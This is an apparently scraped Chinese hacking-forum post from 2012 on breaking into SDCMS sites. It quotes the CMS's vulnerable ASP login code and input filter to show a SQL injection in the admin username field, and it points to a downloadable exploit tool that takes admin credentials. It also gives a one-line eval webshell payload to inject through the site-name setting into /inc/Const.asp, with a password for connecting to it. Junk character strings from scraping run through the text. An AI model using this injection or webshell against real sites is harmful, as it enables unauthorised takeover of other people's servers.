作者:T00LS 鬼哥
2 L) Q, I g+ c ~# e9 X2 S9 U漏洞文件:后台目录/index.asp: G) `1 F# E. S8 N0 b4 @
) @3 q. n! r# M2 Q$ o
Sub Check+ v4 `/ ~9 \0 L' q
Dim username,password,code,getcode,Rs
0 h9 E' I [% R* d4 v% u IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
8 _' a) {- S7 ? U username=FilterText(Trim(Request.Form("username")),1)1 G8 i& _3 O- l7 U; t5 E' n
password=FilterText(Trim(Request.Form("password")),1)
0 ]7 @+ G1 G7 j, @' E0 V- H code=Trim(Request.Form("yzm"))
. }, K( g; [+ c, J1 D( [; g getcode=Session("SDCMSCode")9 P9 s/ k% N0 B
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
& H# h) i* Q. c, _* d IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied* ]) {+ n7 X8 e5 B/ }4 L: `
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied3 i# }2 C( A' t, H+ d ?
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied4 w# d# _& P T7 a: N5 |. z# K
IF username="" or password="" Then
4 K# q* T8 M! m Echo "用户名或密码不能为空"ied9 n$ d% k: [6 p+ y
Else/ E! q$ K' v1 {8 ?. F# |
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
# ^9 E8 c0 q6 I0 G IF Rs.Eof Then
( m6 v" g' B# x" E AddLog username,GetIp,"登录失败",1
+ @) i, y8 M+ R' D! V$ _' ] Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
, j! `- u. m% a: ? ]1 v& D Else+ g" p; O) s8 C4 i J
Add_Cookies "sdcms_id",Rs(0). L6 J4 e! D" u2 u
Add_Cookies "sdcms_name",username3 H1 v. D/ n# N9 z: I; A" U
Add_Cookies "sdcms_pwd",Rs(2)7 L; ]* e% I4 D# [, f' e. O
Add_Cookies "sdcms_admin",Rs(3)! F+ G2 E& Q$ I2 @- e2 B
Add_Cookies "sdcms_alllever",Rs(4)( _5 o0 _+ _- |, a* y" E
Add_Cookies "sdcms_infolever",Rs(5)" T' ~( s/ I& w. F; ^$ s9 X
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
8 C+ F4 F+ E" E' A AddLog username,GetIp,"登录成功",1* t3 r) Q+ y8 x, j
'自动删除30天前的Log记录
6 ]0 w8 I! t/ Z" J1 g8 u& T IF Sdcms_DataType Then
3 V. W0 S2 M0 a) N Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
* ^ O. q& P' N2 _# ^/ ^" C Else
; h! b0 E6 z; o1 Q Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
5 L; C, J: e8 y4 I# j+ ?, L& h End IF* n. Q( T' o$ @ \# d: u
Go("sdcms_index.asp")
. {) U% y" y- Q; {' P End IF; e& x+ {+ q# V( ~7 N' q
Rs.Close% i" m/ U, q1 c- W$ H' E# `
Set Rs=Nothing
+ x# j. }8 n' A z7 [% | y6 Z End IF2 W+ f7 }1 r( q% q$ z/ C
End Sub9 w% m2 Q8 l% K% }& ?
: o& r4 K; O( ^5 k# ?
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码8 E# q8 |+ m6 E
7 j1 i1 `; G! _3 g M
Function FilterText(ByVal t0,ByVal t1)% z, @& o# r1 }* `3 v5 D
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function! h. g' U# G) a& K! B
t0=Trim(t0)
" A2 Y5 x! A0 K# w Select Case t19 M( |% e1 _, M& u" f1 S9 U
Case "1"! |# v! q) |, B/ j
t0=Replace(t0,Chr(32),"") d( C9 b. [- r' f6 D- J+ {7 l
t0=Replace(t0,Chr(13),"")1 \, r1 @7 H4 p5 b% r _3 g
t0=Replace(t0,Chr(10)&Chr(10),"")) r- Y8 p7 e% D u
t0=Replace(t0,Chr(10),"")" I7 w0 V" J# A* {5 }# h0 T% q# k) X
Case "2"
% \6 R( J4 Y! Y1 \ t0=Replace(t0,Chr(8),"")'回格 K% W" }5 t" c
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
% @) n1 w9 N* N' w' g t0=Replace(t0,Chr(10),"")'换行$ U& ^& k! \' I, u8 z9 W
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
; W( _- q0 h( q5 _4 z- @; y$ I1 t ? t0=Replace(t0,Chr(12),"")'换页
$ D1 B6 z: O) ^2 Y5 _ t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合' M- n* I2 S7 J, j
t0=Replace(t0,Chr(22),"")
7 `- }3 p5 }" J t0=Replace(t0,Chr(32),"")'空格 SPACE q3 Y5 X5 V/ Z0 ]
t0=Replace(t0,Chr(33),"")'!2 m# g3 j2 c5 f+ ~
t0=Replace(t0,Chr(34),"")'"2 z3 W" u+ _5 l2 r
t0=Replace(t0,Chr(35),"")'#3 @1 M! W1 ]0 M h
t0=Replace(t0,Chr(36),"")'$# ]6 T2 t* N- B8 f. X- I: j
t0=Replace(t0,Chr(37),"")'%- u3 {# P! K% a' }7 ^' C
t0=Replace(t0,Chr(38),"")'&
2 P$ U( x1 l" N6 b t0=Replace(t0,Chr(39),"")''1 V4 ~3 H2 R, v; ^0 @
t0=Replace(t0,Chr(40),"")'(
( R' P; Q/ m- Y t0=Replace(t0,Chr(41),"")')0 G f( Q5 r$ J9 D7 j' g9 v
t0=Replace(t0,Chr(42),"")'*: e& e7 Y" c% K" Y$ W
t0=Replace(t0,Chr(43),"")'+
& K* ~9 y# m- n t0=Replace(t0,Chr(44),"")',1 z: C3 |( w1 n) c* N! ~9 T: N( {
t0=Replace(t0,Chr(45),"")'-- D" Z" W% O8 N) r4 O- k, N: y& K# ]( u" b
t0=Replace(t0,Chr(46),"")'.5 Q7 R( d) p4 }7 q) o6 t" s
t0=Replace(t0,Chr(47),"")'/' z8 h0 j0 q5 J" ^, S) P) ~* z
t0=Replace(t0,Chr(58),"")':
1 ?8 D3 i2 S& M" z2 B t0=Replace(t0,Chr(59),"")';
4 U7 F6 |" }* {8 J/ r* o% i t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
' X3 N6 }. V8 |1 c0 @ t0=Replace(t0,Chr(63),"")'?
) }" z. V6 _% b- _ t0=Replace(t0,Chr(64),"")'@( g6 v H# b5 q7 D/ M
t0=Replace(t0,Chr(91),"")'\
) M" P. ^/ p, T h0 i9 ~ t0=Replace(t0,Chr(92),"")'\% L& b4 h" J* F P6 ]/ S
t0=Replace(t0,Chr(93),"")']
8 ^% i$ {5 U, i: ?+ S, H- \6 T t0=Replace(t0,Chr(94),"")'^' j" j S2 j! u/ P
t0=Replace(t0,Chr(95),"")'_% N4 L5 E( @/ ?- W) z4 |
t0=Replace(t0,Chr(96),"")'`
" l/ Z S$ v+ q1 N; Q2 r2 P6 ~+ c t0=Replace(t0,Chr(123),"")'{) M) J& C: i1 o
t0=Replace(t0,Chr(124),"")'|
1 g- A( p' D* S3 Q2 u$ | t0=Replace(t0,Chr(125),"")'}5 }8 Q; `/ E# P2 V
t0=Replace(t0,Chr(126),"")'~
* B: P7 e. a. X1 w, h/ ^ Case Else! ?/ X: [5 H4 ?# h4 C2 l1 ^
t0=Replace(t0, "&", "&")
6 k! Q# { _' l. M+ q9 m. o/ T t0=Replace(t0, "'", "'")" n! {/ s/ k, Y% }" ~
t0=Replace(t0, """", """)
# }$ S$ j8 U7 E/ }, Q& O0 h- N- C t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
, O- T5 h6 J8 ]( y! }6 _/ c* g End Select; F. c2 `7 W, T
IF Instr(Lcase(t0),"expression")>0 Then
# Q+ E. u3 Q' G* {/ _% Z& M# n t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
2 g9 j& R( A" o- b End If
5 m$ g: m2 C+ F- s3 W/ k FilterText=t04 u" \: l( ]% |7 y
End Function
% E. D2 Z/ i. r( e4 Y2 |- v1 V9 m$ l* c M/ [) N0 n
看到没。直接参数是1 只过滤
0 b& K" [$ l4 ?8 U0 L t0=Replace(t0,Chr(32)," ")5 J' A8 X1 f# j; I' Z
t0=Replace(t0,Chr(13),"")) y- J# o$ T3 N/ ]& H
t0=Replace(t0,Chr(10)&Chr(10),"1 U( `6 @% e' N6 w B% h) ?; Y
"). S& |. N- S- J
t0=Replace(t0,Chr(10),"3 t( m# p: C% S/ G
")
4 i* {* m7 [, p- w0 L漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!3 y+ | |9 E( z& Q. X
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP9 U5 P+ j: s8 C; q% v( U& C0 ~6 U
% r3 f, ~2 A& M/ t6 q, S2 l7 ~, ?测试:
" [, y- j$ x- A0 p; }+ T3 L6 H
" d4 C% C: C" f3 j- j; O/ d7 @& {; A$ V: ]
现在输入工具上验证码,然后点OK
6 {* F# m0 B* B
9 q# `2 F, I2 @4 n9 m# _4 G) g: L
) M4 q) z+ ~# V6 b' e, Z9 W看到我们直接进入后台管理界面了,呵呵!. i9 ^/ c h2 I0 u" M2 \
' X1 g; J6 T! N: N. M1 i6 z( {% p. T) t* T( W9 `
) h$ x6 T- I5 a. P: Y7 ]+ ~
这样直接进入后台了。。。。! k* i5 f( ~1 w
- | A3 x! }- S ' y! A3 W3 E( B l3 m
' r2 f0 C5 Y, O8 K2 U5 I
SDCMS提权:3 C3 Z/ Q% @& f+ ]* V5 e
0 s, [6 h+ x% v) l* A: F9 C
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
z; M8 E! \. C. X) z
6 i% f4 }# z& w3 J" k- a+ _3 w: i( p% Z# x# J5 N8 q
& i/ D* z) P! x& Z5 jOK,现在用菜刀连接下!
5 r- C) J$ ]6 d( k, D6 F7 E3 J0 s2 z' _4 S0 C( K8 o y2 r
; k+ e- ]; V: G, m* u' M, z* E& m
8 W3 P5 @6 _0 M" X- Z
: v2 `/ p% x7 n9 ]6 B/ m! o: c3 B& P1 x7 h4 A) C$ E% ]4 ?
|
发表于 2012-11-9 20:57:02
收藏
支持
反对